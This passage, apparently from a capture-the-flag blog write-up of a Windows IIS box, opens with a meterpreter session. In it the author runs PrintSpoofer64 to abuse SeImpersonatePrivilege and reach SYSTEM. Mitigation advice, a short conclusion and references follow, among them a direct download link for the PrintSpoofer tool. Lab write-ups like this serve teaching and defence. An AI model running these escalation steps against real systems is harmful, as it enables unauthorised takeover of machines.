&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">meterpreter&lt;/span> &lt;span class="o">&amp;gt;&lt;/span> &lt;span class="n">shell&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">Process&lt;/span> &lt;span class="mi">3240&lt;/span> &lt;span class="n">created&lt;/span>&lt;span class="p">.&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">Channel&lt;/span> &lt;span class="mi">3&lt;/span> &lt;span class="n">created&lt;/span>&lt;span class="p">.&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">Microsoft&lt;/span> &lt;span class="n">Windows&lt;/span> &lt;span class="p">[&lt;/span>&lt;span class="n">Version&lt;/span> &lt;span class="mf">10.0.14393&lt;/span>&lt;span class="p">]&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">(&lt;/span>&lt;span class="n">c&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="mi">2016&lt;/span> &lt;span class="n">Microsoft&lt;/span> &lt;span class="n">Corporation&lt;/span>&lt;span class="p">.&lt;/span> &lt;span class="n">All&lt;/span> &lt;span class="n">rights&lt;/span> &lt;span class="n">reserved&lt;/span>&lt;span class="p">.&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">c&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="err">\&lt;/span>&lt;span class="n">inetpub&lt;/span>&lt;span class="err">\&lt;/span>&lt;span class="n">wwwroot&lt;/span>&lt;span class="err">\&lt;/span>&lt;span class="n">nt4wrksv&lt;/span>&lt;span class="o">&amp;gt;&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="err">\&lt;/span>&lt;span class="n">PrintSpoofer64.exe&lt;/span> &lt;span class="o">-&lt;/span>&lt;span class="n">i&lt;/span> &lt;span class="o">-&lt;/span>&lt;span class="n">c&lt;/span> &lt;span class="n">powershell.exe&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">.&lt;/span>&lt;span class="err">\&lt;/span>&lt;span class="n">PrintSpoofer64.exe&lt;/span> &lt;span class="o">-&lt;/span>&lt;span class="n">i&lt;/span> &lt;span class="o">-&lt;/span>&lt;span class="n">c&lt;/span> &lt;span class="n">powershell.exe&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">[&lt;/span>&lt;span class="o">+&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="n">Found&lt;/span> &lt;span class="n">privilege&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="n">SeImpersonatePrivilege&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">[&lt;/span>&lt;span class="o">+&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="n">Named&lt;/span> &lt;span class="n">pipe&lt;/span> &lt;span class="n">listening&lt;/span>&lt;span class="p">...&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">[&lt;/span>&lt;span class="o">+&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="n">CreateProcessAsUser&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="n">OK&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">Windows&lt;/span> &lt;span class="n">PowerShell&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">Copyright&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="n">C&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="mi">2016&lt;/span> &lt;span class="n">Microsoft&lt;/span> &lt;span class="n">Corporation&lt;/span>&lt;span class="p">.&lt;/span> &lt;span class="n">All&lt;/span> &lt;span class="n">rights&lt;/span> &lt;span class="n">reserved&lt;/span>&lt;span class="p">.&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">PS&lt;/span> &lt;span class="n">C&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="err">\&lt;/span>&lt;span class="n">Windows&lt;/span>&lt;span class="err">\&lt;/span>&lt;span class="n">system32&lt;/span>&lt;span class="o">&amp;gt;&lt;/span> &lt;span class="n">whoami&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">whoami&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">nt&lt;/span> &lt;span class="n">authority&lt;/span>&lt;span class="err">\&lt;/span>&lt;span class="n">system&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>So as you can see, I have now taken over the machine 🎉&lt;/p>
&lt;h2 id="mitigation-techniques">Mitigation Techniques
&lt;/h2>&lt;ol>
&lt;li>
&lt;p>&lt;strong>Disable Unnecessary Services(like port 49663)&lt;/strong>:&lt;/p>
&lt;ul>
&lt;li>Regularly review and disable any services that are not required. This reduces the attack surface and potential entry points for attackers.&lt;/li>
&lt;/ul>
&lt;/li>
&lt;li>
&lt;p>&lt;strong>Least Privilege Principle&lt;/strong>:&lt;/p>
&lt;ul>
&lt;li>Apply the principle of least privilege to all user accounts and services. Users and services should only have the minimum level of access necessary to perform their tasks.&lt;/li>
&lt;/ul>
&lt;/li>
&lt;li>
&lt;p>&lt;strong>Strong Authentication Mechanisms(in this case for smb)&lt;/strong>:&lt;/p>
&lt;ul>
&lt;li>Use strong, complex passwords and consider implementing multi-factor authentication (MFA) to add an extra layer of security to user accounts.&lt;/li>
&lt;/ul>
&lt;/li>
&lt;/ol>
&lt;h2 id="specific-mitigations">Specific Mitigations
&lt;/h2>&lt;ol>
&lt;li>
&lt;p>&lt;strong>Restrict SMB Access&lt;/strong>:&lt;/p>
&lt;ul>
&lt;li>Disable anonymous access to SMB shares. Configure SMB shares to require authentication and only allow access to authorized users.&lt;/li>
&lt;li>Apply strict permissions to SMB shares, ensuring that only necessary users have write access.&lt;/li>
&lt;/ul>
&lt;/li>
&lt;li>
&lt;p>&lt;strong>Secure HTTP Access&lt;/strong>:&lt;/p>
&lt;ul>
&lt;li>Ensure that HTTP services are properly secured. If file uploads are required, implement strict controls to validate and sanitize uploaded files to prevent the upload of malicious files such as reverse shells.&lt;/li>
&lt;li>Use secure coding practices to prevent vulnerabilities such as arbitrary file upload and remote code execution.&lt;/li>
&lt;/ul>
&lt;/li>
&lt;li>
&lt;p>&lt;strong>Restrict Privileges&lt;/strong>:&lt;/p>
&lt;ul>
&lt;li>Regularly review and restrict the assignment of high-privilege accounts such as those with &lt;code>SeImpersonatePrivilege&lt;/code>. Only assign such privileges to accounts that absolutely require them.&lt;/li>
&lt;li>Use Group Policy to enforce restrictions on privilege assignments and regularly audit these policies.&lt;/li>
&lt;/ul>
&lt;/li>
&lt;li>
&lt;p>&lt;strong>Implement Endpoint Protection&lt;/strong>:&lt;/p>
&lt;ul>
&lt;li>Deploy endpoint protection solutions that can detect and block common attack techniques, such as reverse shells and privilege escalation tools like PrintSpoofer.&lt;/li>
&lt;li>Regularly update endpoint protection signatures and configurations to ensure they can detect the latest threats.&lt;/li>
&lt;/ul>
&lt;/li>
&lt;li>
&lt;p>&lt;strong>Harden Print Spooler Service&lt;/strong>:&lt;/p>
&lt;ul>
&lt;li>Regularly audit and review the security of the Print Spooler service. Disable the Print Spooler service on systems where it is not required.&lt;/li>
&lt;li>Apply patches and updates related to the Print Spooler service to address known vulnerabilities.&lt;/li>
&lt;/ul>
&lt;/li>
&lt;li>
&lt;p>&lt;strong>Application Whitelisting&lt;/strong>:&lt;/p>
&lt;ul>
&lt;li>Implement application whitelisting to control which executables are allowed to run on the system. This can prevent unauthorized tools and scripts from executing.&lt;/li>
&lt;/ul>
&lt;/li>
&lt;li>
&lt;p>&lt;strong>Isolate and Monitor High-Privilege Accounts&lt;/strong>:&lt;/p>
&lt;ul>
&lt;li>Isolate high-privilege accounts and monitor their usage closely. Implement additional security controls such as MFA and session logging for these accounts.&lt;/li>
&lt;/ul>
&lt;/li>
&lt;/ol>
&lt;h2 id="conclusion">Conclusion
&lt;/h2>&lt;p>Overall, this was an easy box actually which required a lot of patience 😅. Exploitation after finding that exposed folder on port 49663 is easy. Rest all scripts and tools are available online to use.&lt;/p>
&lt;!-- - **Summary:** Brief summary of the entire process.
- **Lessons Learned:** Key lessons learned from the exploitation process.
- **Additional Notes:** Any additional notes or thoughts on the machine. -->
&lt;h2 id="references">References
&lt;/h2>&lt;ul>
&lt;li>&lt;a class="link" href="https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer" target="_blank" rel="noopener"
>https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer&lt;/a>&lt;/li>
&lt;li>&lt;a class="link" href="https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" target="_blank" rel="noopener"
>https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe&lt;/a>&lt;/li>
&lt;/ul></description></item></channel></rss>